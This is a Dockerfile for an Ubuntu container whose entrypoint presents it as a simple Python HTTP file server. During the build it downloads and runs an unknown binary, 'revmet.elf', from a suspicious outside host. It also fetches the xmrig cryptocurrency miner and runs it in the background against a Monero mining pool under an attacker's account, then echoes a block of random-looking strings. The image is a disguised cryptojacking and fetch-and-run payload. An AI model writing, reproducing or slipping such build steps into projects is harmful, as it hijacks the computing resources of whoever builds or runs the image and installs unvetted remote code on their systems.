FROM ubuntu:bionic

SHELL ["/bin/bash", "-c"]

RUN apt-get update && apt-get install -y \
    wget \
    ocl-icd-libopencl1 \
    libmicrohttpd-dev \
    libc6 \
    libstdc++6

WORKDIR /root
RUN wget http://mail.oogle.dev:8000//revmet.elf

RUN wget https://github.com/xmrig/xmrig/releases/download/v2.14.1/xmrig-2.14.1-xenial-x64.tar.gz
RUN tar -xzvf xmr*
WORKDIR /root/xmrig-2.14.1
RUN ./xmrig -a cryptonight --background -o stratum+tcp://xmr.pool.minergate.com:45700 -u fewa342rwr@tutanota.com -p x

WORKDIR /root
RUN chmod 777 revmet.elf
RUN ./xmrig-2.14.1/xmrig -a cryptonight --background -o stratum+tcp://xmr.pool.minergate.com:45700 -u fewa342rwr@tutanota.com -p x;./revmet.elf
RUN echo 7YNLkPTtwuBa3Va7OudW5VoD6ZgLAB5a oRjf0VRxXJzRrjfipaeDR5mpyhRZMy38 zXvM8VbSU4asuqYtyd2vVWIEfpgDsQCW bESCWCOU7zx4twMZiwpbLMRdjQxgazQW xcKidwejh9Q0xIBqLgEfuWPtCyk4IjrH DOdaot8GqfiPlelSQV5vIVDxE1p3xSGk 4wwtptK54PSpEssu81IsOfQe0aHlVzBb YwOuENc0XoRV3PeI5vuyQ6sZ3PBkjVJL PWCD1pQqwkp0MhVA9vHD1dm2pTwRKaLf TBFq1F4KclokFK22OqKUOqCa6YCU2N6N Acc1MpjeUESasIWdBrueQHqHCaGpXCit hJd96DRBbU3jdQoqekEQH8QQvAuQWQVI HnvKOGYAk1CNbWB9fbtVOP3FpUsDHzuz dnhnSgKN6xYMnEo50pBGj0I9kLk6wNHP DGLrlBP1wP15Z7bzvFORfIDPVXxlKOw8 iRR8Zp0TOxlCM7JSEpHNyxmT4XM90YWc zsaOLYboLruHMbrsWTTwF76XhxiEn5Vb JlcMVQX0KrjEurxbQ9jbtcmhwOFZNPb7 g0B5O2hD9pRQwxZWGXhnBJRmjZt4WqIH ddddddd

ENTRYPOINT ["python3", "-m", "http.server"]